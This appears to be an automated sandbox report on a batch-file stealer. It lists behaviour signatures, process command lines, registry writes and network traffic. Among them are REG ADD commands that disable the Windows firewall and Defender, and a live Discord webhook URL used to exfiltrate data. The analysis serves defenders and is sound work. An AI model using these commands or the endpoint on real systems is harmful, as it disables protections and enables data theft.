| File name: | SAB4.0.bat |
| Full analysis: | https://app.any.run/tasks/4ebb6b9b-2c7c-45e8-9906-b372f8be4044 |
| Verdict: | Malicious activity |
| Threats: | Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. |
| Analysis date: | June 21, 2025, 08:51:50 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/x-msdos-batch |
| File info: | DOS batch file, ASCII text, with CRLF line terminators |
| MD5: | 32BB273113940C1D84BE90CDA0E6A3D0 |
| SHA1: | 3009978410653A103911317F958C8DA449EC0D9C |
| SHA256: | 9A1D88663E6E7BD4D5266A104E51A1F7E7B178A0B6A5227490D061CF6A480809 |
| SSDEEP: | 96:nQI8XV8wDIH5E8+aNbDqtXSEWHvEqJ0IEXvEgR:nQI0IHvnNbD+CEWHvxuDXcgR |
MALICIOUS
Disables task manager
- reg.exe (PID: 6504)
- reg.exe (PID: 2044)
Disables Windows firewall
- reg.exe (PID: 1712)
- reg.exe (PID: 6980)
- reg.exe (PID: 2808)
- reg.exe (PID: 320)
- reg.exe (PID: 1204)
- reg.exe (PID: 724)
Changes firewall settings
- reg.exe (PID: 1712)
- reg.exe (PID: 6980)
- reg.exe (PID: 2808)
- reg.exe (PID: 1204)
- reg.exe (PID: 724)
- reg.exe (PID: 320)
Disables Windows Defender
- reg.exe (PID: 728)
- reg.exe (PID: 640)
UAC/LUA settings modification
- reg.exe (PID: 2220)
- reg.exe (PID: 2296)
Uses NET.EXE to stop Windows Update service
- net.exe (PID: 2028)
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
- net.exe (PID: 1984)
Starts NET.EXE for service management
- cmd.exe (PID: 2136)
- net.exe (PID: 2028)
- cmd.exe (PID: 6704)
- net.exe (PID: 1984)
Create files in the Startup directory
- cmd.exe (PID: 2136)
Task Manager has been disabled (taskmgr)
- reg.exe (PID: 2044)
SUSPICIOUS
Starts process via Powershell
- powershell.exe (PID: 2716)
- powershell.exe (PID: 2216)
Executing commands from a ".bat" file
- powershell.exe (PID: 2716)
- powershell.exe (PID: 2216)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 6508)
- cmd.exe (PID: 2136)
- cmd.exe (PID: 1148)
- cmd.exe (PID: 6704)
Uses ICACLS.EXE to modify access control lists
- cmd.exe (PID: 6508)
- cmd.exe (PID: 2136)
- cmd.exe (PID: 1148)
- cmd.exe (PID: 6704)
Possible usage of Discord/Telegram API has been detected (YARA)
- cmd.exe (PID: 2136)
- powershell.exe (PID: 6892)
- cmd.exe (PID: 6704)
Uses REG/REGEDIT.EXE to modify registry
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
The process connected to a server suspected of theft
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
Suspicious use of NETSH.EXE
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
Reads security settings of Internet Explorer
- ShellExperienceHost.exe (PID: 4520)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 2216)
- powershell.exe (PID: 2716)
Windows service management via SC.EXE
- sc.exe (PID: 3800)
- sc.exe (PID: 5352)
Starts SC.EXE for service management
- cmd.exe (PID: 2136)
- cmd.exe (PID: 6704)
INFO
Checks proxy server information
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
- slui.exe (PID: 2144)
Script raised an exception (POWERSHELL)
- powershell.exe (PID: 6892)
- powershell.exe (PID: 3504)
Reads mouse settings
- reg.exe (PID: 6776)
- reg.exe (PID: 3748)
Disables trace logs
- netsh.exe (PID: 6104)
- powershell.exe (PID: 3504)
- netsh.exe (PID: 6336)
- powershell.exe (PID: 6892)
Checks supported languages
- ShellExperienceHost.exe (PID: 4520)
Reads the computer name
- ShellExperienceHost.exe (PID: 4520)
Launching a file from the Startup directory
- cmd.exe (PID: 2136)
Manual execution by a user
- cmd.exe (PID: 1148)
- rundll32.exe (PID: 868)
- rundll32.exe (PID: 2632)
- rundll32.exe (PID: 1712)
- rundll32.exe (PID: 5712)
- rundll32.exe (PID: 6380)
- rundll32.exe (PID: 3108)
- rundll32.exe (PID: 5284)
- rundll32.exe (PID: 320)
- rundll32.exe (PID: 3880)
- rundll32.exe (PID: 2348)
- rundll32.exe (PID: 7100)
- rundll32.exe (PID: 6264)
- rundll32.exe (PID: 1508)
- rundll32.exe (PID: 2612)
Reads security settings of Internet Explorer
- rundll32.exe (PID: 2632)
- rundll32.exe (PID: 2348)
Reads Microsoft Office registry keys
- rundll32.exe (PID: 2632)
- rundll32.exe (PID: 2348)
Remote server returned an error (POWERSHELL)
- powershell.exe (PID: 3504)
- powershell.exe (PID: 6892)
Reads the software policy settings
- slui.exe (PID: 2144)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
ims-api
(PID) Process(2136) cmd.exe
Discord-Webhook-Tokens (1)1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
(PID) Process(6892) powershell.exe
Discord-Webhook-Tokens (1)1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Webhook-Tokens (2)1385864776902774865/nxfnzjtjnf0afmrmbf63cbitfigk1xqallpolnp5qabgkvfs4h48tjsrlb-xoxugyla1
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/nxfnzjtjnf0afmrmbf63cbitfigk1xqallpolnp5qabgkvfs4h48tjsrlb-xoxugyla1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/nxfnzjtjnf0afmrmbf63cbitfigk1xqallpolnp5qabgkvfs4h48tjsrlb-xoxugyla1
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
(PID) Process(6704) cmd.exe
Discord-Webhook-Tokens (1)1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Discord-Info-Links
1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Get Webhook Infohttps://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1
Total processes
196
Monitored processes
60
Malicious processes
15
Suspicious processes
4
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 320 | REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 320 | "C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Downloads\VARIETY_WOLFED_VARIETY_WOLFED_addedlearning.png | C:\Windows\System32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 640 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 724 | REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 728 | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 868 | "C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\admin\Downloads\VARIETY_WOLFED_tryingmusic.jpg | C:\Windows\System32\rundll32.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1056 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1148 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyAutoStart.bat"" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1164 | REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off" /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1204 | REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f | C:\Windows\System32\reg.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Registry Console Tool Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
41 037
Read events
40 979
Write events
58
Delete events
0
Modification events
| (PID) Process: | (2716) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.FriendlyAppName |
Value: Windows Command Processor | |||
| (PID) Process: | (2716) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache |
| Operation: | write | Name: | C:\WINDOWS\System32\cmd.exe.ApplicationCompany |
Value: Microsoft Corporation | |||
| (PID) Process: | (6504) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System |
| Operation: | write | Name: | DisableTaskMgr |
Value: 1 | |||
| (PID) Process: | (6776) reg.exe | Key: | HKEY_CURRENT_USER\Control Panel\Mouse |
| Operation: | write | Name: | SwapMouseButtons |
Value: 1 | |||
| (PID) Process: | (1564) reg.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer |
| Operation: | write | Name: | NoDesktop |
Value: 1 | |||
| (PID) Process: | (1164) reg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
| Operation: | write | Name: | SmartScreenEnabled |
Value: Off | |||
| (PID) Process: | (6980) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile |
| Operation: | write | Name: | EnableFirewall |
Value: 0 | |||
| (PID) Process: | (1712) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile |
| Operation: | write | Name: | EnableFirewall |
Value: 0 | |||
| (PID) Process: | (2808) reg.exe | Key: | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile |
| Operation: | write | Name: | EnableFirewall |
Value: 0 | |||
| (PID) Process: | (728) reg.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender |
| Operation: | write | Name: | DisableAntiSpyware |
Value: 1 | |||
Executable files
0
Suspicious files
1
Text files
23
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6892 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dvcsdpzx.a2r.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2716 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_24czphjg.n3n.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2136 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_addedlearning.png | image | |
MD5:D8D25F42FC9C4644D032992A897DA5BF | SHA256:C43BEF99CD6F828116A142CD4396CA9E3CD263EE5904E6E1F0ECFF9018A6ADC0 | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_idyrngma.w4o.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6704 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_VARIETY_WOLFED_addedlearning.png | image | |
MD5:D8D25F42FC9C4644D032992A897DA5BF | SHA256:C43BEF99CD6F828116A142CD4396CA9E3CD263EE5904E6E1F0ECFF9018A6ADC0 | |||
| 2136 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyAutoStart.bat | text | |
MD5:32BB273113940C1D84BE90CDA0E6A3D0 | SHA256:9A1D88663E6E7BD4D5266A104E51A1F7E7B178A0B6A5227490D061CF6A480809 | |||
| 2136 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_requirementslibrary.jpg | image | |
MD5:A1B90E0D4C540455EA5937717C703D58 | SHA256:7F9A2876C346E84160BDA5D0A53C959157521B1EBF435012368400F0FF0EFEB3 | |||
| 3504 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_25at1v5o.ec1.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 2216 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3ufmcryo.c2u.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6704 | cmd.exe | C:\Users\admin\Downloads\VARIETY_WOLFED_VARIETY_WOLFED_fatformat.png | image | |
MD5:D4C4B4BA90C99A51B3CA99F721ED29C5 | SHA256:DB4B349C3A8C77D581C0DDA0535B4AFF16DA068884BF50DB78EB3303770D8FE1 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
21
DNS requests
8
Threats
10
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
2764 | RUXIMICS.exe | GET | 200 | 23.53.40.176:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
2764 | RUXIMICS.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | POST | — | 162.159.128.233:443 | https://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1 | unknown | — | — | whitelisted |
— | — | POST | — | 162.159.128.233:443 | https://discord.com/api/webhooks/1385864776902774865/NxFnzjTjNF0AFMRMbF63CBItfiGK1xQaLlpolNP5QAbGKVfs4h48tJsrLB-XoxUgYlA1 | unknown | — | — | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
— | — | POST | 500 | 40.91.76.224:443 | https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail | unknown | xml | 512 b | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
1268 | svchost.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
2764 | RUXIMICS.exe | 23.53.40.176:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
1268 | svchost.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
2764 | RUXIMICS.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
discord.com |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
2200 | svchost.exe | Misc activity | ET INFO Observed Discord Domain in DNS Lookup (discord .com) |
2200 | svchost.exe | Misc activity | ET INFO Discord Chat Service Domain in DNS Lookup (discord .com) |
6892 | powershell.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
6892 | powershell.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
6892 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |
3504 | powershell.exe | Misc activity | ET INFO Observed Discord Domain (discord .com in TLS SNI) |
3504 | powershell.exe | Misc activity | ET INFO Observed Discord Service Domain (discord .com) in TLS SNI |
3504 | powershell.exe | Successful Credential Theft Detected | STEALER [ANY.RUN] Attempt to exfiltrate via Discord |
— | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |